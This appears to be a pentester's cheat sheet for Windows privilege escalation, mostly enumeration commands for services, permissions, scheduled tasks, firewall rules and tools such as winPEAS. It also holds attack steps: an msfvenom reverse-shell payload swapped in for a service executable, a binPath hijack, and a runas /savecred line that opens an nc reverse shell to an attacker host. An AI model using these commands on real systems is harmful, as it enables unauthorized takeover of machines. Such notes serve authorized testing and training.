Privilege Escalation on Windows

Privilege Escalation Paths – look for:

Misconfigured services
File permissions on binaries or services
OS/Kernel vulnerabilities
Vulnerable software running with high privileges
Sensitive information stored in local files – like hard coded credentials
Registry settings that always elevate privileges before executing a binary
Other, be creative… 😉

Old Windows version, check HackTheBox – Servmon (for winPEAS, to validate)

Service

DLL Hijacking: see HackTricks
Windows Unquoted Service Path
Named Pipes
Registry
Executable File
binPath

Kernel

Search for exploits? List applied KB:

OS Version

Seems more reliable than systeminfo and winPEAS output…

REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId

powershell
Get-WmiObject -query 'select * from win32_quickfixengineering'

Password Mining

Password Mining
    Registry
        HKCU\Software\SimonTacham\PuTTY\Sessions
        AutoLogin
        VNC
    Logs
    .rdp Files
    Memory
        Mimikatz
        Process Dump (minidump)
    Configuration Files
        unattend xml
        SiteList.xmlm
        web.config
        vnc.ini
    Cached SAM

Registry

Autorun
AlwaysInstallElevated

Scheduled Tasks

Binary Overwrite
Missing Binary

Hot Potato

To complete…

Startup Applications

To complete….

User Enumeration

whoami

net user

net user <username>

Groups for current user

whoami /groups

Privileges for current user

The Disabled state only indicates if the current process enabled this privilege, but the user still has the privilege.

whoami /priv

Host

Hostname

Hostname can give indication of the server’s purpose and OS. Host naming convention could be used to discover more targets.

hostname

OS / Architecture

Use this instead!! Double-check…

REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId

English OS

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

French OS

systeminfo | findstr /B /C:"Nom du syst" /C:"Version du syst" /C:"Type du syst"

Processes & Services

Look for processes running with high privileged accounts, and with insecure permissions or vulnerabilities.

Tasklist Official Documentation. Output is limited when not an admin.

Vulnerabilities

See Windows Unquoted Service Path.

Processes mapped to specific Windows services

tasklist /SVC

powershell
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

List services & drivers

Official Documentation (Microsoft)

Obtains and displays information about the specified service, driver, type of service, or type of driver.

sc query

sc query <service name>

sc query type=service

sc qc <service name>

NOT TESTED

sc config <service name> binPath=c:\...\rev.exe

Check file permissions for all running processes

powershell
$list=Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

foreach ($item in $list) {
    if($item.PathName) {
        if($item.PathName -match '"') {
            icacls $item.PathName.split('"')[1]
        }else {
            icacls $item.PathName.split(' ')[0]
        }
    }
}

Check permissions on a specific file

If interesting (custom) services, check if we can overwrite the executable. See Official Documentation for icacls.

F – Full access
M- Modify access
RX – Read and execute access
R – Read-only access
W – Write-only access

icacls "C:\Program Files\<some file>.exe"

Installed applications / Software
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=443 -f exe > myprecious.exe
sudo nc -nlvp 443

# Transfer file to Windows

cd "C:\Program Files"
cd <software folder>
move "Software.exe" "Software_bak.exe"
move myprecious.exe Software.exe
shutdown /r /t 5

Network

Can be used to pivot 😉

ipconfig /all

Route Official Documentation

route print

Listening ports and established sessions

netstat -ano

List shares

net share

Firewall

See netsh official documentation, and documentation on netsh firewall.

netsh advfirewall show currentprofile

netsh advfirewall firewall show rule name=all

netsh advfirewall firewall show rule status=enabled name=all

netsh advfirewall firewall show rule dir=out status=enabled name=all | findstr /i LocalPort | sort /unique

netsh advfirewall firewall show rule name=all dir=in type=dynamic

Open ports

netsh firewall show state

Scheduled Jobs

Look for scripts in scheduled jobs that can be modified and run as high privileged users.

See schtasks official documentation.

schtasks /query /fo LIST

schtasks /query /fo LIST /v

Display only task names

schtasks /query /fo LIST | findstr /B /C:"TaskName"

Task To Run

Can this be used for Windows Unquoted Service Path? TO VALIDATE 😉

schtasks /query /fo LIST /v | findstr /C:"Task To Run"

Software Versions

See Windows Management Instrumentation (WMI). Only for programs installed using Windows Installer.

wmic product get name, version, vendor

wmic qfe get Caption, Description, HotFixID, InstalledOn

Permissions on files

Use AccessChk from SysInternals.

accesschk.exe -uws "Everyone" "C:\Program Files" -accepteula

accesschk.exe -uws "Everyone" "C:\Program Files"

powershell
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Unmounted Disks

See mountvol.

mountvol

Device Drivers & Kernel Modules

Loaded drivers

powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Drivers & versions

powershell
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | sort-
object -Property DeviceName -Unique

Binaries That AutoElevate

Check the status of the AlwaysInstallElevated registry. Value of 1 allows any user to run Windows Installer packages with elevated privileges. If enabled, craft an MSI file and run it to elevate privileges.

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Automation

Use winPEAS and PowerUp.

WinPEAS

WinPeas is the best option.

git clone https://github.com/carlospolop/PEASS-ng.git

cp ~/PEASS-ng/winPEAS/winPEASbat/winPEAS.bat ~/impacket-share

Upload the file on the victim host. See File Transfer. Execute winPEAS on the victim:

winPEAS.bat

When commands like systeminfo and tasklist give Access denied errors:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/ab1b188fb3e88f5071f9faa98e432921f033d357/winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/winPEAS.exe

Jaws

wget https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1

.\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt

windows-privesc-check

See windows-privesc-check on GitHub.

Help

windows-privesc-check2.exe -h

List groups – Dump info to analyze manually

windows-privesc-check2.exe --dump -G

List drives – Dump info to analyze manually

windows-privesc-check2.exe --dump -D

List shares – Dump info to analyze manually

windows-privesc-check2.exe --dump -H

Identify and report security weaknesses

windows-privesc-check2.exe --audit -S -o C:\Users\<username>\Desktop\audit-services

windows-privesc-check2.exe --audit --allfiles -o report-allfiles.txt

examine opts:
    At least one of these to indicate what to examine (*=not implemented)

    -a, --all           All Simple Checks (non-slow)
    -A, --allfiles      All Files and Directories (slow)
    -D, --drives        Drives
    -e, --reg_keys      Misc security-related reg keys
    -E, --eventlogs     Event Log*
    -f INTERESTING_FILE_LIST, --interestingfiledir=INTERESTING_FILE_LIST
                        Changes -A behaviour.  Look here INSTEAD
    -F INTERESTING_FILE_FILE, --interestingfilefile=INTERESTING_FILE_FILE
                        Changes -A behaviour.  Look here INSTEAD.  On dir per
                        line
    -G, --groups        Groups
    -H, --shares        Shares
    -I, --installed_software
                        Installed Software
    -j, --tasks         Scheduled Tasks
    -k, --drivers       Kernel Drivers
    -L, --loggedin      Logged In
    -O, --ntobjects     NT Objects
    -n, --nointerestingfiles
                        Changes -A/-f/-F behaviour.  Don't report interesting
                        files
    -N, --nounreadableif
                        Changes -A/-f/-F behaviour.  Report only interesting
                        files readable by untrsuted users (see -x, -X, -b, -B)
    -P, --progfiles     Program Files Directory Tree
    -r, --registry      Registry Settings + Permissions
    -R, --processes     Processes
    -S, --services      Windows Services
    -t, --paths         PATH
    -T PATCHFILE, --patches=PATCHFILE
                        Patches.  Arg is filename of xlsx patch info.
                        Download from
                        http://go.microsoft.com/fwlink/?LinkID=245778 or pass
                        'auto' to fetch automatically
    -U, --users         Users
    -v, --verbose       More verbose output on console
    -W, --errors        Die on errors instead of continuing (for debugging)
    -z, --noappendices  No report appendices in --audit mode

adPEAS

Check https://github.com/61106960/adPEAS

Privilege Escalation Techniques

User Account Control (UAC) Bypass
Kernel driver vulnerabilities
Windows Insecure file permissions
Windows Unquoted Service Path
Juicy Potato
PrintSpoofer
Windows OS privileges (whoami /priv): see https://github.com/gtworek/Priv2Admin
OffSec Journey
PetitPotam NTLM Relay

Stored Credentials

If cmdkey /list returns entries, it means that you may able to runas certain user who stored his credentials in windows.

runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \IP\share\nc.exe -nv KALI_IP 80 -e cmd.exe"